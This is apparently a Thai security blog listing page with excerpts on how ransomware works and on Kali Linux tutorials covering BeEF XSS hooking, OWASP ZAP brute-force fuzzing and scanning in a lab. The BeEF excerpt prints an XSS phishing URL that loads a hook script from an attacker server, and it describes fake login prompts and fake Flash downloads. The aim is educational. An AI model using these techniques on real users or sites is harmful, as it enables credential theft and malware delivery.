มัลแวร์เรียกค่าไถ่ Ransomware

ทุกวันนี้อินเตอร์เน็ตเข้ามามีอิทธิพลต่อชีวิตประจำวันเป็นอย่างมาก ทุกคนไม่ว่าจะเป็นใคร ทำอาชีพอะไร อยู่ที่ไหนในโลกนี้ก็สามารถเข้าถึงอินเตอร์เน็ตได้ด้วยอุปกรณ์ต่าง ๆ ที่หลากหลาย เช่น คอมพิวเตอร์ แท็บเล็ต และสมาร์ทโฟน เป็นต้น อุปกรณ์เหล่านี้ทำให้เราเข้าถึงโลกอินเตอร์เน็ตที่กว้างใหญ่ได้ ดังนั้นเราจึงไม่ควรมองข้ามภัยอันตรายที่แฝงอยู่ในรูปแบบต่าง ๆ โดยเฉพาะอย่างยิ่งภัยอันตรายที่มาจากมัลแวร์ชนิดหนึ่งที่มันจะมาจับเครื่องหรือไฟล์ของเราเป็นตัวประกัน เพื่อเรียกค่าไถ่ มัลแวร์ชนิดนี้สร้างความตื่นตัวให้กับคนทั่วโลก รวมถึงประเทศไทยมาแล้ว  ดังจะเห็นได้จากหน่วยงานราชการต่าง ๆ ในประเทศไทยได้มีการออกหนังสือราชการ ประกาศแจ้งเตือนให้เพิ่มความระมัดระวังในการเปิดอ่านไฟล์ที่แนบมากับจดหมายอิเล็กทรอนิกส์ให้มากยิ่งขึ้น มัลแวร์ที่ประสงค์ร้ายต่อข้อมูลในอุปกรณ์ต่าง ๆ ของเราดังกล่าว จัดเป็นมัลแวร์ประเภท “Ransomware” หรือ “มัลแวร์เรียกค่าไถ่” มีเป้าหมายที่ตรวจพบการโจมตีแล้วทั้งในระบบปฏิบัติการ Window, Android, iOS และ Linux โดยแบ่งตามการทำงานออกเป็น 2 รูปแบบหลัก ๆ อุปกรณ์ต่าง ๆ ของเรานคือ Lock Screen Ransomware Ransomware รูปแบบนี้จะใช้ความสามารถของ Lock Screen ทำการล็อคหน้าจอหรือปิดกั้นการเข้าใช้งานเครื่องคอมพิวเตอร์ หรือสมาร์ทโฟนของเหยื่อไว้ ไม่ให้สามารถเข้าถึงโปรแกรมต่าง ๆ และข้อมูลในเครื่องได้ พร้อมทั้งแสดงข้อความเรียกค่าไถ่เพื่อปลดล็อคดังรูปที่ 2 เป็นหน้าจอของสมาร์ทโฟนระบบปฏิบัติการ Android ที่ติด Ransomware ชื่อ iToper File Encrypting Ransomware เครื่องผู้ใช้งานที่ติด Ransomware ในรูปแบบนี้จะสามารถใช้งานอุปกรณ์ และเข้าถึงโปรแกรมต่าง ๆ ได้ตามปกติ แต่ไฟล์ต่าง ๆ ที่อยู่ในเครื่องทั้งหมด ไม่ว่าจะเป็นไฟล์เอกสาร ไฟล์วีดีโอ หรือไฟล์รูปภาพ และอื่น ๆ จะถูกเข้ารหัสไว้ไม่ให้ผู้ใช้งานสามารถเข้าถึงได้ จากนั้นจึงเรียกค่าไถ่โดยการทิ้งข้อความแสดงคำแนะนำวิธีการจ่ายเงินเพื่อแลกกับคีย์ที่ใช้ในการถอดรหัสไฟล์กลับคืนมาดังรูปที่ 3 เป็นตัวอย่างหน้าจอการเรียกค่าไถ่ของ Ransomware รูปแบบนี้ที่ชื่อ CryptoLocker สถิติการโจมตีของ Ransomware มีสถิติที่น่าสนใจจาก Solutionary ซึ่งเป็นบริษัทด้านความปลอดภัยในเครือ NTT Group ได้ออกรายงานสถิติการโจมตีของ Ransomware ที่ตรวจพบได้ในไตรมาสที่ 2 ของปี 2016 พบว่าหน่วยงานด้านสาธารณสุขเป็นหน่วยงานที่ถูกโจมตีมากที่สุดถึง 88% รองลงมาคือหน่วยงานด้านการศึกษา 6% และหน่วยงานด้านการเงิน 4% โดย Ransomware สายพันธ์ที่ตรวจพบมากที่สุดคือ CryptoWall คิดเป็น 94% รูปที่ 4 สถิติการโจมตีของ Ransomware ในไตรมาสที่ 2 ปี 2016 [ที่มา : https://www.helpnetsecurity.com/2016/07/27/ransomware-healthcare-industry ] ช่องทางการโจมตีของ Ransomware การโจมตีส่วนใหญ่จะมาทางอีเมล์หลอกลวงที่แนบไฟล์ Ransomware ไว้ โดยเนื้อหาในอีเมล์จะดึงดูดให้ผู้อ่านอยากคลิกเข้าไปอ่าน เช่น อีเมล์แจ้งเลขที่ใบสั่งซื้อสินค้า (OrderID) หากผู้ใช้ไม่คลิกไปเปิดไฟล์แนบ ก็อาจจะทำให้สูญเสียโอกาสทางการค้าได้ ซึ่งถ้าผู้ใช้คลิกเปิดไฟล์โดยไม่ระมัดระวัง ก็จะตกเป็นเหยื่อของ Ransomware ทันที ไฟล์แนบที่มากับอีเมล์จะเป็น zip file หากแตกไฟล์ออกมาก็จะพบไฟล์นามสกุล .doc, .xls, .ppt หรือไฟล์อื่นๆ ที่เราคุ้นเคย แต่ถ้าสังเกตดี ๆ จะพบว่านามสกุลของไฟล์จริง ๆ แล้วเป็น .exe เรียกเทคนิคการตั้งชื่อไฟล์แบบนี้ว่า Double Extensions โจมตีด้วยวิธี Social Engineering เป็นการหลอกผู้ใช้งานให้ดาวน์โหลดโปรแกรมมาติดตั้งในเครื่อง เช่น ในขณะที่ใช้งานระบบลงทะเบียนเรียนออนไลน์ของมหาวิทยาลัย พบว่ามี Pop-up ขึ้นมาบอกว่า ให้ดาวน์โหลดโปรแกรมเสริมมาติดตั้งเพื่อให้สามารถลงทะเบียนได้สะดวก และรวดเร็วขึ้น ทั้ง ๆ ที่โปรแกรมนี้ไม่มีอยู่จริง หากผู้ใช้งานหลงเชื่อและทำการดาวน์โหลดมาติดตั้ง ไฟล์ต่าง ๆ ก็จะโดนจับเป็นตัวประกันทันที โจมตีทางช่องโหว่ของ Browser รวมถึง Add-on, Plug-in ต่าง ๆ เช่น Java, Flash และ Acrobat Reader เป็นต้น เทคนิคที่ File Encrypting Ransomware ใช้ในการเข้ารหัส Ransomware ส่วนใหญ่จะเข้ารหัสไฟล์โดยใช้ Asymmetric Key Algorithms ประกอบด้วยกุญแจ 2

Read More »

วิธีใช้งาน Kali Linux – BeEF – XSS Framework

จาก วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan ได้แสดงให้เห็นว่า เมื่อตรวจเจอช่องโหว่ Cross Site Scripting (XSS) บนเครื่องเป้าหมาย จากที่ได้เคยบรรยายไปใน Web Hacking and Security Workshop เรื่อง วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 : วิธีการ Hack ด้วย SQL Injection และ Cross-Site Scripting ซึ่งแสดงให้เห็นว่า หากมีช่องโหว่ดังกล่าว ทำให้สามารถใส่ JavaScript ลงไปได้ ซึ่งอาจจะดูไม่น่าจะอันตรายอะไร แต่ ถ้า Hacker พบช่องโหว่ XSS (reflected) นี้บน Website ของเรา แล้วส่ง URL ที่แนบ JavaScript ไปหลอกผู้ใช้ของเรา อาจจะเป็นทาง Email ก็จะเป็นปัญหาได้ ต่อไปนี้ จะแนะนำอีกเครื่องมือหนึ่ง ที่ชื่อว่า BeEF XSS Framework ใน Kali Linux ดังวิธีการใช้งาน “เบื้องต้น” ให้เห็นอันตรายของช่องโหว่นี้ ดังนี้ เปิด Application > 08 Exploitation Tools > beef xss framework เมื่อระบบทำงานแล้ว ให้ copy Example Hook ไว้ก่อน แล้วมา Login BeEF Website โดยใส่ username/password เป็น beef/beef ต่อไป อาจจะส่ง email ไปหลอกผู้ใช้ของระบบ โดยใส่ Link เป็น http://192.168.56.101/xss/simple.php?name=<script src=”http://192.168.56.102:3000/hook.js”></script> โดยในที่นี้ 192.168.56.101 เป็น Website ที่มีช่องโหว่ XSS 192.168.56.102 เป็น BeEF Server ของ Hacker ที่เปิด port 3000 รอให้ Download hook.js ไปติดตั้ง หากผู้ใช้โดนหลอกให้คลิก จะปรากฏภาพดังนี้ เมื่อมีผู้ใช้โดนหลอกให้คลิกเรียบร้อย ทาง Hacker ที่ใช้ BeEF จะเห็นหน้าจอดังนี้ BeEF สามารถรู้รายละเอียดของ Browser ของเป้าหมายได้ ในเมนู Command สามารถทำอะไรได้หลายอย่าง เมื่อเลือก Browser > Hooked Domain > Get Page HREFs แล้วคลิก Execute จากนั้น มาดูผลงานใน Command results ก็จะเห็นว่า ใน Page ของผู้ใช้ มี Link เดิมเป็น http://xssattackexamples.com เป็นต้น จากนั้น เลือก Replace HREFs เป็น http://beefproject.com/ แล้วคลิก Execute ตรวจสอบผลงาน พบว่า Link ถูกเปลี่ยนไป 2 ตำแหน่ง ผู้ใช้จะเห็น Link เปลี่ยนไปดังภาพ สั่งให้ Pop Dialog ถามรหัสผ่านผู้ใช้ (แบบบ้านๆ) สั่งให้หลอกถาม username/password ของ Google สั่งให้หลอกถามแบบ Facebook และหลอกให้ download Flash Player แต่จริงๆแล้วเป็น Virus/Malware/Ransomware    

Read More »

วิธีใช้งาน Kali Linux – OWASP Zap – Brute Force with Fuzz

ในการตรวจสอบ ความแข็งแกร่งของระบบป้องกันการโจมตี เรื่องหนึ่งคือความสามารถในการกัน Brute Force หรือ ความพยายามเดารหัสผ่าน OWASP Zap สามารถใช้เป็นเครื่องมือในการทำ Brute Force ได้ โดยใช้เครื่องมือที่ชื่อว่า Fuzz ขั้นตอนมีดังนี้ เปิด Zap และเปิด Web Browser ที่ตั้งค่าให้ Zap เป็น Proxy และ ทำการ Authentication ทดสอบดู ใน Zap จะปรากฏ POST Action ที่สำหรับส่ง Username และ Password เกิดขึ้น เลือก Username ที่ทดสอบใส่ลงไป แล้วคลิกขวา เลือก Fuzz จากนั้นคลิก Payloads จากนั้น คลิกปุ่ม Add เลือก Type เป็น Strings แล้วใส่ Username ที่จะใช้ในการเดา เสร็จแล้วคลิกปุ่ม Add จากนั้น เลือกข้อความที่เป็น Password แล้วคลิก Add แล้วคลิก Payload แล้วใส่ Password ที่จะเดา เสร็จแล้วคลิกปุ่ม Add เมื่อตั้งค่าเสร็จแล้ว คลิกปุ่ม Start Fuzz Zap จะทำการเดา Username/Password เมื่อเสร็จแล้ว ลองสังเกตผลใน Tab Fuzzer ผลที่ได้อาจจะแตกต่างกันในแต่ละระบบที่โจมตี แต่ในภาพ จะเห็นว่า มี Size Response Header อยู่บรรทัดหนึ่งที่มีขนาดแตกต่างจากอันที่ไม่สำเร็จ คือ 390 bytes (บรรทัดอื่นๆเป็น 310 bytes) เมื่อลองคลิกดู แล้วไปดูใน Tab Response จะเห็นว่า มีการ Set-Cookie แสดงว่า Login ได้แล้ว ใน Column Payloads จะเห็นว่า รหัสผ่านเป็น admin,123456 สามารถเอาไปทดสอบได้ ในตัวอย่างนี้ ถ้ามีระบบป้องกันการเดารหัสผ่าน เช่น fail2ban ก็จะสามารถลดความเสี่ยงได้ (บ้าง)

Read More »

วิธีใช้งาน Kali Linux – OWASP Zap – User Authentication

ในการตรวจสอบ Web Application ที่ต้องมีการ Authentication โดยใช้งานผ่าน Web Form จะต้องกำหนดค่าให้ OWASP Zap รู้ว่า จุดใดเป็น Login Form และ Field ใดที่ใช้เป็น Username และ Password ก่อน หลังจากนั้น จะสามารถกำหนดได้ว่า จะโจมตีด้วย Username ใดบ้าง เพื่อใช้ในการทดสอบ ขั้นตอนในการตั้งค่าและโจมตีมีดังนี้ ใน Web Browser ให้ตั้งค่า Proxy เป็น 127.0.0.1 Port 8080 ทำการเปิด Web Page ที่ต้องการโจมดี โดยให้ทำเป็น Login ตามปรกติ ด้วย Username/Password ที่ใช้งานได้จริง เมื่อ Login สำเร็จแล้ว จะได้หน้าตาประมาณนี้ จากนั้น กลับไปที่ OWASP Zap จะเห็นว่าใน Sites มี URL ของ Website ที่ต้องการโจมตีปรากฏอยู่ จากนั้นให้ คลิกขวาที่ URL ที่ต้องการโจมตี คลิก Include in Context > Default Context จะปรากฏหน้าต่าง Session Properties ให้ทราบว่า จะใช้งาน URL นี้ ให้คลิกปุ่ม OK จากนั้นให้คลิก POST Action ที่เป็นการส่งข้อมูลการ Login ผ่าน Web Form แล้ว คลิกขวา เลือก Flag as context > Default Context : Form-based Auth login Request จะปรากฏหน้าต่าง Session Properties อีกครั้ง ให้ทราบว่า จะใช้ Login Form Target URL และ Login Request POST DATA ดังภาพ ให้กำหนดว่า Username Parameter และ Password Parameter คือ Field ใด จากนั้น ให้คลิกปุ่ม OK จากนั้น ให้คลิก Tab Response ของ POST Action ที่ใช้ในการ Login แล้วมองหา ข้อความ ที่จะให้ OWASP Zap ค้นหา เพื่อเป็นการยืนยังว่า สามารถ Login ได้แล้ว จากนั้น คลิกขวา แล้วเลือก Flag as Context > Default Context: Authentication Logged-in indicator จะปรากฏหน้าต่าง Session Properties อีกครั้ง ให้ทราบว่า Regex pattern identified in Logged in response message คือคำใด จากนั้น ให้คลิกปุ่ม OK จากนั้น คลิก Users ด้านซ้ายมือ แล้ว คลิก เครื่องหมายถูก หน้า Username ที่จะใช้ในการ Login จากนั้น คลิก Forced Users ด้านซ้ายมือ แล้วเลือก User ที่จะใช้ในการโจมตี แล้วคลิก OK  

Read More »

วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan

ใน Kali Linux มีเครื่องมือ Web Application Security Scanner ที่น่าสนใจตัวหนึ่ง คือ OWASP Zap (Open Web Application Security Project) เหมาะสำหรับการใช้งานตั้งแต่การทดสอบเบื้องต้น ไปจนถึงการโจมตีขั้นสูงได้ *** คำเตือน : อย่าใช้เครื่องมือนี้กับระบบคอมพิวเตอร์ที่ท่านไม่ใช่เจ้าข้องเด็ดขาด *** ในบทความนี้ จะแสดงขั้นตอนการทดสอบ Web Application โดยใช้กระบวนการ Active Scan ใน Kali Linux เปิด Applications > 03 Web Application Analysis > owasp-zap เลือก No, I do not want to persist this session at this moment in time แล้วคลิก Start (ยังไม่ต้องใช้ในตอนนี้) ในช่อง URL to attack ใส่ URL ของ Web Application ที่ต้องการทดสอบ แล้วคลิก Attack ระบบจะทำการ Spider และ Active Scan ตามลำดับ ผลที่ได้ “ในเบื้องต้น” ก็จะแค่แสดงในส่วนของ Alerts ทั่วไปเกี่ยวกับการตั้งค่าที่อาจจะไม่เหมาะสม เช่น X-Frame-Options Header ไม่ได้ตั้งค่าไว้, มีการใช้ Private IP, ไม่ได้ป้องกัน XSS และอื่นๆเป็นต้น เนื่องจากเครื่องที่ทำการทดสอบนี้ จริงๆแล้ว มี Directory ย่อยๆ ลงไปอีกมากมาย ที่ไม่ได้ชี้ Link ไปจาก index.php ในหน้าแรกของ Web Site วิธีการที่จะให้ OWASP ZAP กวาดไฟล์เดอร์ย่อยๆออกมา ใช้คลิกขวาที่ Sites ที่ต้องการ แล้ว Attack > Forced Browse site จากนั้นจะปรากฏ Forced Browse Tab ขึ้นมา ให้เลือก directory-list-1.0.txt ซึ่งจะทำการ Brute Force ชื่อ Directory ที่เค้าไปเก็บรวบรวมมา จากนั้น ทำการ Attack ด้วย Spider อีกครั้ง จากนั้น ทำการ Attack ด้วย Active Scan อีกครั้ง แต่ให้ตั้งค่าใน Policy Tab ดังภาพ เพื่อให้ Threshold เป็น High และ Strength เป็น Insane (จะอธิบายละเอียดอีกครั้งในบทความต่อไป) คลิก Go ทั้ง 2 บรรทัด แล้วคลิก Start Scan ดูผลการ Scan ได้ที่ Alerts Tab ดังตัวอย่างพบว่ามีช่องโหว่สำคัญคือ Cross Site Scripting (Reflected), Path Traversal และ Remote File Inclusion โดยบอกวิธีการ Attack ที่ใช้ในการทดสอบ และวิธีการแก้ไขพร้อม จะกลับมาอภิปราย และอธิบายรายละเอียดอีกครั้งในบทความต่อไป References: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project https://github.com/zaproxy/zap-core-help/wiki https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Read More »